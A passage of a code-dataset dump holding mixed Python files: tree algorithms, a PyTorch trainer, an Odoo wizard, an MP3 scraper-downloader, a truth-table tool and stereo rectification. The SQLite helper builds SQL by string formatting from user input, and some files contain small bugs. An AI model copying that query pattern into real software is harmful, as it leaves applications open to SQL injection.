TreeNode(val)\n else:\n insert(root.left, val)\n\n\nroot = TreeNode(20)\ninsert(root, 8)\ninsert(root, 22)\ninsert(root, 4)\ninsert(root, 12)\ninsert(root, 10)\ninsert(root, 14)\nget_inorder(root)\nexpected = 20\nactual = get_io_successor(root, 14)\nprint(expected == actual)\n","sub_path":"tree/successor.py","file_name":"successor.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"133168897","text":"from typing import Any, Iterable\nfrom py_config_runner import Schema, get_params\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\n# this config schema can be imported if torch is installed\nfrom py_config_runner import TrainConfigSchema\n\n\nclass TorchTrainingConfigSchema(Schema):\n # Define required parameters for another training config\n # Type hints are from typing\n seed: int\n debug: bool\n\n num_epochs: int\n\n train_loader: DataLoader\n val_loader: DataLoader\n\n model: nn.Module\n criterion: nn.Module\n optimizer: optim.Optimizer\n\n\ndef run(config, **kwargs):\n\n # Let's validate the config\n TorchTrainingConfigSchema.validate(config)\n # and additionally agains built-in TrainConfigSchema\n TrainConfigSchema.validate(config)\n\n print(\"Configuration: \")\n for k, v in get_params(config, TrainConfigSchema).items():\n print(f\"\\t{k}: {v}\")\n\n device = config.get(\"device\", \"cuda\")\n model = config.model\n model.to(device)\n\n criterion = config.criterion\n optimizer = config.optimizer\n\n for e in range(config.num_epochs):\n print(\"Epoch {} / {}\".format(e + 1, config.num_epochs))\n for i, batch in enumerate(config.train_loader):\n if (i % 50) == 0:\n print(\" \", end=\".\")\n x, y = batch[0].to(device), batch[1].to(device)\n optimizer.zero_grad()\n y_pred = model(x)\n loss = criterion(y_pred, y)\n loss.backward()\n optimizer.step()\n print(\"\")\n\n if e % config.get(\"val_interval\", 3) == 0:\n num_corrects = 0\n num_samples = 0\n for batch in config.val_loader:\n x, y = batch[0].to(device), batch[1].to(device)\n y_pred = model(x)\n\n num_corrects += (y_pred.argmax(dim=1) == y).sum()\n num_samples += y_pred.shape[0]\n\n print(f\"Validation: accuracy = {num_corrects / num_samples}\")\n","sub_path":"examples/pytorch/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"631759738","text":"from Game.Sprite import Sprite\n\nclass Background(Sprite):\n\tdef __init__(self, thisScene, imageFile, xSize, ySize, scrollX = 0, scrollY = 0):\n\t\tsuper().__init__(thisScene, imageFile, xSize, ySize)\t\t\n\t\tself.scrollAmountX = scrollX\n\t\tself.scrollAmountY = scrollY\n\t\tself.setBoundAction(Sprite.CONTINUE)\n\n\t\t\n\tdef update(self, offX = 0, offY = 0):\n\n\t\texternX = int(offX * self.scrollAmountX)\n\t\texternY = int(offY * self.scrollAmountY)\t\t\n\t\t\n\t\t\n\t\tfor ix in range((externX * -1), self.cWidth, self.width):\n\t\t\tfor iy in range((externY * -1),self.cHeight, self.height):\n\t\t\t\tself.setPosition(ix + self.width/2, iy + self.height/2)\n\t\t\t\tsuper().update()\n\t\t\t\t\t","sub_path":"Game/Background.py","file_name":"Background.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"140851639","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import fields, models, api, _\n\n\nclass HandedToPartnerNRWizard(models.TransientModel):\n _name = 'handed.to.partner.nr.wizard'\n _description = 'Handed To Partner NR Wizard'\n\n journal_id = fields.Many2one('account.journal', string='Journal', translate=True)\n account_id = fields.Many2one('account.account', string='Account', translate=True)\n date = fields.Date(string='Date', default=fields.Date.context_today, translate=True)\n note = fields.Char(string='Notes', translate=True)\n\n @api.multi\n def handed_to_partner_action(self):\n context = dict(self.env.context or {})\n active_id = context.get('active_id', False)\n if active_id:\n obj = self.env['account.check.nr'].browse(active_id)\n move_line_vals = []\n\n if not self.journal_id.default_credit_account_id:\n raise ValidationError(_(\"You must determine the default account of Under Partnerion Journal!\"))\n\n line = (0, 0, {'account_id': self.account_id.id,\n 'partner_id': obj.check_partner.id,\n 'name': obj.check_number,\n 'debit': obj.amount,\n 'credit': 0.0,\n })\n move_line_vals.append(line)\n line = (0, 0, {'account_id': self.journal_id.default_credit_account_id.id,\n 'partner_id': obj.check_partner.id,\n 'name': obj.check_number,\n 'debit': 0.0,\n 'credit': obj.amount,\n })\n move_line_vals.append(line)\n\n move_vals = {\n \"date\": self.date,\n \"name\": str(obj.check_number),\n \"line_ids\": move_line_vals,\n 'ref': obj.payment_id.communication or '',\n 'company_id': obj.company_id.id,\n 'journal_id': obj.journal_id.id,\n }\n move = self.env['account.move'].create(move_vals)\n\n operation_values = {\n 'date': self.date,\n 'type': 'nr',\n 'type_of_check': 'nr',\n 'operation': 'Handed To Partner',\n 'journal_id': move.journal_id.id,\n 'move_id': move.id,\n 'partner': obj.check_partner.id,\n 'note': self.note,\n }\n operation = self.env['account.check.operation.nr'].create(operation_values)\n\n obj.write({\n 'state': 'handed_to_partner',\n 'operation_ids': [(4, operation.id)],\n })\n\n\n","sub_path":"checks/wizards/handed_to_partner_nr_wizard.py","file_name":"handed_to_partner_nr_wizard.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"597409062","text":"from __future__ import print_function\r\nimport os\r\nimport sys\r\n\r\n\r\ndef flatlandSpaceStations(n, c):\r\n op = [0] * n\r\n c = sorted(c)\r\n i = 0\r\n left = None\r\n right = c[i]\r\n for _ in range(n):\r\n if left == None:\r\n tmp = abs(_ - right)\r\n op[_] = tmp\r\n elif left != None and right != None:\r\n tmp = min(abs(_ - left), abs(_ - right))\r\n op[_] = tmp\r\n elif right == None:\r\n tmp = abs(_ - left)\r\n op[_] = tmp\r\n # print(_, i, \"left:\", left , \"right:\", right, \"op:\", tmp)\r\n if _ == left or _ == right:\r\n i += 1\r\n tmp = c[i] if i < len(c) else None\r\n left, right = right, tmp\r\n return max(op)\r\n\r\n\r\nif __name__ == '__main__':\r\n f = open('./input.txt')\r\n nm = f.readline().strip().split()\r\n n = int(nm[0])\r\n m = int(nm[1])\r\n c = map(int, f.readline().strip().rstrip().split())\r\n result = flatlandSpaceStations(n, list(c))\r\n print(result)\r\n","sub_path":"hackerrank/algorithms/implementation/flatland-space-stations.py","file_name":"flatland-space-stations.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"529089258","text":"import sqlite3 as sq\n\n\n\ndef cadastraUsuatio(nome, idade, email):\n \n banco = sq.connect('database.db')\n cursor = banco.cursor()\n cursor.execute(f'INSERT INTO pessoas VALUES(\"{nome}\",\"{idade}\",\"{email}\")')\n\n banco.commit() \n print(cursor.fetchall())\n return {'id' : 1,'nome': nome,'idade': idade,'email' : email}\n\n'''\ndef criar_database():\n\n banco = sq.connect('database.db')\n cursor = banco.cursor()\n cursor.execute('CREATE TABLE pessoas (nome text , idade integer , email text)')\n'''\n\nbanco = sq.connect('database.db')\ncursor = banco.cursor()\ncursor.execute('SELECT * FROM pessoas')\nprint(cursor.fetchall())","sub_path":"Treinamento/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"242172444","text":"\"\"\"MCTV JSON HANDLER\"\"\"\nimport json\n\ndef openjson(filename):\n \"\"\"opens the json file \"filename\" and\n returns a python object with the content of that file\"\"\"\n f1 = open(filename,\"r\")\n lines = f1.readlines()\n f1.close()\n lines = \"\".join(lines).replace(\"\\n\",\"\")\n jsn = json.loads(lines)\n return jsn\n\ndef newjson(dic):\n \"\"\"takes a dictionary and returns a json object with the main\n MCTV things defined.\n The dictionary contains:\n \"height\" (REQUIRED) height of the images\n \"width\" (REQUIRED) width of the images\n \"densmin\" (optional) density value of minimum pixel value (defaults to 0)\n \"densmax\" (optional) density value of maximum pixel value (defaults to 255)\n \"densunit\" (optional) unit of density values (defaults to 8-bit)\n \"res\" (optional) resolution per pixel in-plane\n \"zres\" (optional) resolution per pixel inter-planes\n \"resunits\" (optional) units of the resolution (defaults to micro-meter)\n\"\"\"\n jsn = {\"height\":dic[\"height\"],\"width\":dic[\"width\"],\"slides\":[]}\n if \"densmin\" in dic:\n jsn[\"densmin\"] = dic[\"densmin\"]\n else:\n jsn[\"densmin\"] = 0\n if \"densmax\" in dic:\n jsn[\"densmax\"] = dic[\"densmax\"]\n else:\n jsn[\"densmax\"] = 255\n if \"densunit\" in dic:\n jsn[\"densunit\"] = dic[\"densunit\"]\n else:\n jsn[\"densunit\"] = \"8-bit\"\n if \"res\" in dic:\n jsn[\"res\"] = dic[\"res\"]\n else:\n jsn[\"res\"] = 1\n if \"zres\" in dic:\n jsn[\"zres\"] = dic[\"zres\"]\n else:\n jsn[\"zres\"] = 1\n if \"resunits\" in dic:\n jsn[\"resunits\"] = dic[\"resunits\"]\n else:\n jsn[\"resunits\"] = \"px\"\n return jsn\n\n\ndef addslide(jsn,path,jid=0,height=0,width=0):\n \"\"\"add a slide to the jsonInfo.txt replacing the job-id specified\n or sorting it by name, returning the json object with the added slide\"\"\"\n if width == 0:\n width = jsn[\"width\"]\n if height == 0:\n height = jsn[\"height\"]\n path = path.replace(\"\\\\\",\"/\").replace(\"//\",\"/\").lstrip(\"/\")+\"/\"\n path = path.replace(\"C:/data\",\"../data\").replace(\"c:/data\",\"../data\")\n slide = {\"path\":path, \"height\":height, \"width\":width}\n slides = jsn[\"slides\"]\n if jid == 0: #old case - no job id provided\n newslides = []\n cntr = 0\n hasAppended = False\n for s in slides:\n if s[\"path\"] < slide[\"path\"]:\n newslides.append(s)\n else:\n newslides.append(slide)\n newslides += slides[cntr:]\n hasAppended = True\n break\n cntr += 1\n if not hasAppended:\n newslides.append(slide)\n else: #new solution: replace slide with same jobid\n newslides = slides\n cntr = 0\n slideid=len(slides)\n for s in slides:\n if s[\"path\"] == None:\n if s[\"jobid\"] == jid:\n slideid = cntr\n break\n cntr += 1\n if slideid != len(slides):\n newslides[slideid] = slide\n jsn[\"slides\"] = newslides\n return jsn\n\ndef addid(jsn,jid,path=None):\n \"\"\"add slide with job-id\"\"\"\n width = jsn[\"width\"]\n height = jsn[\"height\"]\n if path != None:\n path = path.replace(\"\\\\\",\"/\").replace(\"//\",\"/\").lstrip(\"/\")+\"/\"\n path = path.replace(\"C:/data\",\"../data\").replace(\"c:/data\",\"../data\")\n slide = {\"jobid\":jid, \"path\":path, \"height\":height, \"width\":width}\n slides = jsn[\"slides\"]\n newslides = slides\n newslides.append(slide)\n jsn[\"slides\"] = newslides\n return jsn\n\n\ndef writejson(filename,jsn):\n \"\"\"write json object to file\"\"\"\n f1 = open(filename,\"w\")\n f1.write(json.dumps(jsn, indent=4, separators=(',', ': ')))\n f1.close()\n return None\n\nif __name__ == \"__main__\":\n \"\"\"run tests\"\"\"\n jsn = openjson(\"testing\\\\tiles\\\\SFCT\\\\JSONinfo.txt\")\n addslide(jsn,\"../MCTV/exampleblock/_00185\")\n writejson(\"testing\\\\tiles\\\\SFCT\\\\JSONinfo.txt\",jsn)\n","sub_path":"tiler/jsonhandler.py","file_name":"jsonhandler.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"144133272","text":"import requests\nfrom lxml import html as _html\nimport re\nfrom pymplay.MusicPlayer import MusicPlayer\nimport io\nimport os\nfrom downloadsdotnl.config import config\nimport urllib.request\n\n\nclass Searcher(object):\n\n def __init__(self):\n self.base_url = 'http://www.downloads-nl.com/results/mp3/{}/{}'\n self.s = requests.Session()\n self.player = MusicPlayer()\n\n \n def send_request(self, page, query):\n r = self.s.get(\n self.base_url.format(page, query),\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))' \n },\n allow_redirects=True\n )\n\n return r\n\n \n def get_songs(self, page, query):\n doc = _html.fromstring(self.send_request(page, query).text)\n song_urls = doc.xpath(\".//a[@class='tl j-lnk']/@href\")\n files = []\n \n print('Query: {}'.format(query, page))\n \n for url in song_urls:\n full_url = 'http://www.downloads-nl.com/{}&p=1'.format(url)\n \n r = self.s.get(\n full_url,\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT \\\n 9.0; en-US))' \n },\n allow_redirects=True\n )\n \n try:\n m = re.search(\"'Play\\'.'(https?:\\/\\/(?:www\\.|(?!www))[^\\s\\.]+\\.[^\\s]{2,}|www\\.[^\\s]+\\.[^\\s]{2,})'\", r.text).group(1)\n files.append(m)\n except AttributeError:\n pass\n\n print('Found: {} songs on page {}'.format(len(files)), page)\n \n for file in files:\n real_file = '{}/{}'.format(config['download']['dir'], os.path.basename(file))\n print('Saving: {}'.format(real_file))\n \n r = self.s.get(\n file,\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT \\\n 9.0; en-US))' \n },\n allow_redirects=True,\n stream=True\n )\n\n with open(real_file, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024): \n if chunk:\n f.write(chunk)\n\n self.player.play_audio(real_file)\n","sub_path":"build/lib/downloadsdotnl/Searcher.py","file_name":"Searcher.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"270199612","text":"import os\r\ntry:\r\n import pandas as pd\r\n import openpyxl\r\n importBool = True\r\n \r\nexcept ImportError:\r\n print(\"Could not find pandas or openpyxl, please download them using pip if you want to export to excel.\")\r\n importBool = False\r\n\r\n\r\n#Creation of lists to store position______________________________________\r\ndef offsetin(input_dic):\r\n position = 40*(2**(len(input_dic.keys())))\r\n global endpoint; endpoint = position\r\n for i in input_dic.keys():\r\n position //= 2\r\n input_dic[i] = [position,0]\r\n\r\n\r\n#findingAmountOfOperations________________________________________________\r\ndef paranumfunc(str):\r\n counter = 0\r\n for i in str:\r\n if i == '(':\r\n counter += 1\r\n return counter\r\n\r\n#listOfOperators__________________________________________________________\r\ndef xorfunc(a,b):\r\n if (a == 1 and b ==0) or (a == 0 and b ==1):\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef andfunc(a,b):\r\n if (a == 1 and b == 1):\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef orfunc(a,b):\r\n if (a == 0 and b == 0):\r\n return 0\r\n else:\r\n return 1\r\ndef imfunc(a,b):\r\n if (a == 1 and b == 0):\r\n return 0\r\n else:\r\n return 1\r\n\r\ndef nefunc(a):\r\n if a ==1:\r\n return 0\r\n else:\r\n return 1\r\n\r\ndef ouexfunc(a,b):\r\n if (a == 1 and b ==0) or (a == 0 and b ==1):\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef bifunc(a,b):\r\n if (a==1 and b==1) or (a==0 and b==0):\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef nandfunc(a,b):\r\n if (a == 1 and b==1):\r\n return 0\r\n else:\r\n return 1\r\n\r\n#findingExcutions__________________________________________________________\r\ndef findParentheses(string,paraNum,input_dic):\r\n for j in range(paraNum):\r\n curo = ''\r\n nexto = ''\r\n for i in range(len(string)):\r\n if string[i] ==\")\":\r\n nexto = i\r\n evaluate = string[curo+1:nexto].split()\r\n\r\n if evaluate[1] == 'and':\r\n result = andfunc(input_dic[evaluate[0]][1],input_dic[evaluate[2]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= [\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n \r\n elif evaluate[1] == 'or':\r\n result = orfunc(input_dic[evaluate[0]][1],input_dic[evaluate[2]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= [\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n\r\n elif evaluate[1] == 'im':\r\n result = imfunc(input_dic[evaluate[0]][1],input_dic[evaluate[2]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= [\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n\r\n elif evaluate[0] == 'ne':\r\n result = nefunc(input_dic[evaluate[1]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= [\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n\r\n elif evaluate[1] == 'ouex':\r\n result = ouexfunc(input_dic[evaluate[0]][1],input_dic[evaluate[2]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= [\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n\r\n elif evaluate[1] == 'xor':\r\n result = xorfunc(input_dic[evaluate[0]][1],input_dic[evaluate[2]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= [\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n\r\n elif evaluate[1] == 'bi':\r\n result = bifunc(input_dic[evaluate[0]][1],input_dic[evaluate[2]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= [\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n\r\n elif evaluate[1] == 'nand':\r\n result = nandfunc(input_dic[evaluate[0]][1],input_dic[evaluate[2]][1])\r\n var = 'variableNumber' + str(j)\r\n exec('input_dic[var]= [\"null\",result]')\r\n string = string[0:curo] + var + string[nexto + 1:]\r\n break\r\n\r\n elif string[i] ==\"(\":\r\n curo = i\r\n\r\n finalValue = input_dic[var][1]\r\n return finalValue\r\n\r\n\r\n#inputSettings_____________________________________________________________\r\ndef inputSettings(finalInfo, unitTime,locallist,input_dic):\r\n \r\n for key in locallist:\r\n if unitTime == 0:\r\n input_dic[key][1] = 0\r\n elif (int(unitTime)%int(input_dic[key][0])) == 0:\r\n input_dic[key][1] = 0\r\n elif unitTime%(input_dic[key][0]//2) == 0:\r\n input_dic[key][1] = 1\r\n\r\n#printVariableInformation__________________________________________________\r\ndef printVarInfo(finalInfo):\r\n for j in range(len(finalInfo[0][1])):\r\n print(\"The values under column #: \" + str(j+1))\r\n for i in range(finalInfo[-1][0]+1):\r\n print(finalInfo[i][1][j])\r\n print()\r\n\r\n#printMatrixInformation___________________________________________________\r\ndef printResInfo(finalInfo):\r\n print(\"Here are the results for the command:\")\r\n for i in range(finalInfo[-1][0]+1):\r\n print(str(finalInfo[i][2][0]))\r\n\r\n#storeInformationInMatrix__________________________________________________\r\ndef matrixMake(command, paraNum, endpoint, finalInfo,input_dic):\r\n currentpoint = 0\r\n count = 0\r\n locallist = []\r\n for key in input_dic.keys():\r\n if key == 'varialbeNumber0':\r\n break\r\n else:\r\n locallist.append(key)\r\n\r\n for i in range(endpoint//40):\r\n finalInfo.append([count,[],[]])\r\n for j in locallist:\r\n inputSettings(finalInfo, currentpoint,locallist,input_dic)\r\n finalInfo[count][1].append(input_dic[j][1])\r\n finalInfo[count][2].append(findParentheses(command,paraNum,input_dic))\r\n\r\n count +=1\r\n currentpoint += 20\r\n\r\n#exportingInformationToExcel_______________________________________________\r\ndef exportExcel(importBool, finalInfo):\r\n '''Loop to ask if they want to export file to excel'''\r\n given = False\r\n while given == False:\r\n ans = input('Do you wish to export this command to excel? y or n: ')\r\n ans = ''.join(ans.split())\r\n ans.lower()\r\n print(ans)\r\n if ans == 'n':\r\n given = True\r\n elif ans == 'y':\r\n\r\n excelDic = {}\r\n excelColumn = []\r\n\r\n for j in range(len(finalInfo[0][1])):\r\n excelDic[str(j+1)] = []\r\n for i in range(finalInfo[-1][0]+1):\r\n excelDic[str(j+1)].append(finalInfo[i][1][j])\r\n\r\n excelDic['Final'] = []\r\n for i in range(finalInfo[-1][0]+1):\r\n excelDic['Final'].append((finalInfo[i][2][0]))\r\n \r\n for keys in excelDic.keys():\r\n excelColumn.append(keys)\r\n\r\n pf = pd.DataFrame(excelDic, columns = excelColumn)\r\n \r\n excelfile = (input('Please enter the excel file name: '))\r\n newFile = (os.path.join((os.path.dirname(os.path.abspath(__file__))), (excelfile + str('.xlsx'))))\r\n\r\n \r\n '''if os.path.isfile('filename.txt'):\r\n print (\"File exist\")\r\n os.remove(excelfile)'''\r\n \r\n check = False\r\n counter = 1\r\n while check == False:\r\n try:\r\n pf.to_excel(newFile, index = False, header=True)\r\n check = True\r\n except:\r\n newexcelfile = excelfile + str(counter)\r\n newFile = (os.path.join((os.path.dirname(os.path.abspath(__file__))), (newexcelfile + str('.xlsx'))))\r\n counter += 1\r\n \r\n \r\n given = True\r\n\r\n\r\n#mainProgram_______________________________________________________________\r\ndef me(input_dic,finalInfo,importBool):\r\n menu = True\r\n while menu == True:\r\n input_dic = {}\r\n finalInfo = []\r\n\r\n command = input(\"Please input the command: \")\r\n '(a and b)[a,b]'\r\n check = True\r\n counter = 0\r\n bracketCheck = False\r\n\r\n if '[' in command:\r\n bracketCheck = True\r\n\r\n while check == True:\r\n if command[counter] == '[':\r\n variables = command[counter+1:-1]\r\n command = command[:counter]\r\n check = False\r\n if counter == len(command)-2:\r\n check = False\r\n counter +=1\r\n\r\n if bracketCheck == True:\r\n variableList = variables.split()\r\n for i in variableList:\r\n input_dic[i]= []\r\n else:\r\n for i in range(len(command)):\r\n if command[i] ==\"(\":\r\n if command[i+1] != \"(\":\r\n input_dic[command[i+1]] = []\r\n if command[i] == \")\":\r\n if command[i-1] !=\")\":\r\n input_dic[command[i-1]] = []\r\n\r\n '''Create the cycles for each variable'''\r\n offsetin(input_dic)\r\n\r\n '''Detect amount of operations'''\r\n paraNum = paranumfunc(command)\r\n\r\n '''Simulate every iteration and storing information into input_dic and finalInfo'''\r\n matrixMake(command, paraNum, endpoint, finalInfo, input_dic)\r\n\r\n '''Go through the different main options''' \r\n ask = True\r\n while ask:\r\n printOptions = input(\"Here are the different options\\n1 for variable printout\\n2 for result printout\\n3 for new command\\n'end' to stop the program\\n->\")\r\n \r\n if printOptions == '1':\r\n printVarInfo(finalInfo)\r\n elif printOptions == '2':\r\n printResInfo(finalInfo)\r\n if importBool == True:\r\n exportExcel(importBool,finalInfo)\r\n elif printOptions == '3':\r\n ask = False\r\n elif printOptions == 'end':\r\n ask = False\r\n menu = False\r\n else:\r\n print(\"You have inputed a wrong option, please select an available option!\\n\")\r\n\r\n#ProgramStartup_____________________________________________________________\r\ndef m():\r\n '''initialize main variable'''\r\n input_dic = {}\r\n finalInfo = []\r\n me(input_dic,finalInfo,importBool)\r\n\r\nm()\r\n","sub_path":"truthTable/truthTableV1_5.py","file_name":"truthTableV1_5.py","file_ext":"py","file_size_in_byte":10885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"325034019","text":"from pytransform3d.transform_manager import TransformManager\nfrom pytransform3d import transformations as pt\nfrom pytransform3d import rotations as pr\nfrom pytransform3d import batch_rotations as br\nfrom pytransform3d import *\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nimport math\nfrom scipy.spatial.transform import Rotation as R\n\n\n# https://en.wikipedia.org/wiki/Image_rectification\n# https://www.sci.utah.edu/~gerig/CS6320-S2013/Materials/CS6320-CV-F2012-Rectification.pdf\n# https://www.cs.cmu.edu/~16385/s17/Slides/13.1_Stereo_Rectification.pdf\n# https://docs.opencv.org/3.4/d9/d0c/group__calib3d.html\n# https://docs.opencv.org/3.4/d9/d0c/group__calib3d.html#ga617b1685d4059c6040827800e72ad2b6\n\n\n# Z Z\n# ▲ ▲\n# / \\\n# / \\\n# /1 2 3 4 X \\ 1 2 3 4\n# Left Cam |------------ ⯈ |------------ ⯈Right cam\n# 1| 1 |\n# 2| 2 |\n# 3| 3 |\n# Y | Y |\n# ⯆ ⯆\n\n\n# Z ▲\n# | ▲ Y\n# 4| /3\n# 3| /2\n# 2| /1\n# world 1|------------ ⯈ X\n# 1 2 3 4 5\n#\n#\n#\n#\n\n\ndef rotationMatrix(roll, pitch, yaw):\n yawMatrix = np.matrix([\n [math.cos(yaw), -math.sin(yaw), 0],\n [math.sin(yaw), math.cos(yaw), 0],\n [0, 0, 1]\n ])\n\n pitchMatrix = np.matrix([\n [math.cos(pitch), 0, math.sin(pitch)],\n [0, 1, 0],\n [-math.sin(pitch), 0, math.cos(pitch)]\n ])\n\n rollMatrix = np.matrix([\n [1, 0, 0],\n [0, math.cos(roll), -math.sin(roll)],\n [0, math.sin(roll), math.cos(roll)]\n ])\n\n R = yawMatrix * pitchMatrix * rollMatrix\n return R\n\n\ndef creatingEllipsoidInWorldCoordinate(center_x, center_y, center_z, a=2, b=3, c=1.6):\n phiStepSize = 0.10\n thetaStepSize = 0.20\n objectPointsInWorldCoordinate = []\n\n for phi in np.arange(-np.pi, np.pi, phiStepSize):\n for theta in np.arange(-np.pi / 2, np.pi / 2, thetaStepSize):\n X = a * np.cos(theta) * np.cos(phi)+center_x\n Y = b * np.cos(theta) * np.sin(phi)+center_y\n Z = c * np.sin(theta)+center_z\n objectPointsInWorldCoordinate.append(np.array([X, Y, Z]))\n\n return np.array(objectPointsInWorldCoordinate)\n\n\nroll_cam0 = -np.pi / 2\npitch_cam0 = +np.pi / 36\nyaw_cam0 = 0.0\nrotationMatrix_cam0 = rotationMatrix(roll_cam0, pitch_cam0, yaw_cam0)\n\nt0_x = -0.75\nt0_y = -1.0\nt0_z = 1.0\n\n\nt_cam0 = np.array([[t0_x],\n [t0_y],\n [t0_z]])\n\n\ncam0_in_world = pt.transform_from(rotationMatrix_cam0, t_cam0.ravel())\n\nprint(\"cam0_in_world\\n:\", cam0_in_world)\n\nr = R.from_matrix([[1, 0, 0],\n [0, 0, 1],\n [0, -1, 0]])\n\n# print(\"yaw, pitch, roll: \", r.as_euler('zyx', degrees=True))\n# print(\"-----------------------\")\n\n\nroll_cam1 = -np.pi / 2\npitch_cam1 = -np.pi / 36\nyaw_cam1 = 0.0\n\nrotationMatrix_cam1 = rotationMatrix(roll_cam1, pitch_cam1, yaw_cam1)\n\nt1_x = +0.75\nt1_y = -1.0\nt1_z = 1.0\n\n\nt_cam1 = np.array([[t1_x],\n [t1_y],\n [t1_z]])\n\n\ncam1_in_world = pt.transform_from(rotationMatrix_cam1, t_cam1.ravel())\n\nprint(\"cam1_in_world\\n:\", cam1_in_world)\n\ntm = TransformManager()\n\ntm.add_transform(\"cam0\", \"world\", cam0_in_world)\ntm.add_transform(\"cam1\", \"world\", cam1_in_world)\n\nax = tm.plot_frames_in(\"world\", s=.5)\n\n\nax.set_xlim((-5, 5))\nax.set_ylim((-5, 5))\nax.set_zlim((0, 5))\n\nobjectPointsInWorldCoordinate = creatingEllipsoidInWorldCoordinate(\n center_x=0, center_y=4, center_z=1.1, a=2, b=3/5, c=1.6/5)\n\nax.scatter(objectPointsInWorldCoordinate[:, 0],\n objectPointsInWorldCoordinate[:, 1], objectPointsInWorldCoordinate[:, 2])\n\n\n# camera intrinsic parameters\n\n\nfocalLength = 2.0\nnumberOfPixelInHeight = 600\nnumberOfPixelInWidth = 600\n\nheightOfSensor = 10\nwidthOfSensor = 10\n\nmy = (numberOfPixelInHeight) / heightOfSensor\nU0 = (numberOfPixelInHeight) / 2\n\nmx = (numberOfPixelInWidth) / widthOfSensor\nV0 = (numberOfPixelInWidth) / 2\n\n\nK = np.array([\n [focalLength * mx, 0, V0],\n [0, focalLength * my, U0],\n [0, 0, 1]\n ])\n\n\nprint(\"K:\\n\", K)\n\ndistCoeffs = np.array([0.0, 0.0, 0.0, 0.0])\n\n\nimagePoints_cam0, jacobian = cv2.projectPoints(\n objectPointsInWorldCoordinate, np.linalg.inv(rotationMatrix_cam0), -t_cam0, K, distCoeffs)\n\n\nleftImage = np.zeros([numberOfPixelInHeight, numberOfPixelInWidth])\nfor pixel_coordinate in imagePoints_cam0:\n U = int(pixel_coordinate[0, 0])\n V = int(pixel_coordinate[0, 1])\n leftImage[V, U] = 1\n\n\nimagePoints_cam1, jacobian = cv2.projectPoints(\n objectPointsInWorldCoordinate, np.linalg.inv(rotationMatrix_cam1), -t_cam1, K, distCoeffs)\n\nrightImage = np.zeros([numberOfPixelInHeight, numberOfPixelInWidth])\nfor pixel_coordinate in imagePoints_cam1:\n U = int(pixel_coordinate[0, 0])\n V = int(pixel_coordinate[0, 1])\n rightImage[V, U] = 1\n\n\ncam1_in_cam0 = tm.get_transform(\"cam1\", \"cam0\")\nprint(\"cam1_in_cam0:\\n\", cam1_in_cam0)\n\nR = np.zeros([3, 3])\nT = np.zeros([3, 1])\nprint(\"T:\\n\", t_cam1-t_cam0)\n\nR = cam1_in_cam0[0:3, 0:3]\nT = cam1_in_cam0[0:3, 3]\n\nprint(R)\nprint(T)\n\n\n######################## stereoCalibrate ########################\n\n# cv.stereoCalibrate(\tobjectPoints, imagePoints1, imagePoints2, cameraMatrix1, distCoeffs1, cameraMatrix2, distCoeffs2, imageSize[, R[, T[, E[, F[, flags[, criteria]]]]]]\t) ->\tretval, cameraMatrix1, distCoeffs1, cameraMatrix2, distCoeffs2, R, T, E, F\n\n\n######################## stereoRectify ########################\n\n\nR1, R2, P1, P2, Q, validPixROI1, validPixROI2 = cv2.stereoRectify(\n cameraMatrix1=K, distCoeffs1=distCoeffs, cameraMatrix2=K, distCoeffs2=distCoeffs, imageSize=(600, 600), R=R, T=T)\n\n# print(\"R1, R2, P1, P2, Q, validPixROI1, validPixROI2:\\n\",\n# R1, R2, P1, P2, Q, validPixROI1, validPixROI2)\n\n\nprint(\"R1: (rotation matrix) for the first camera, brings points given in the unrectified first camera's coordinate system to points in the rectified first camera's coordinate system:\\n\", R1)\n\nprint(\"R2: 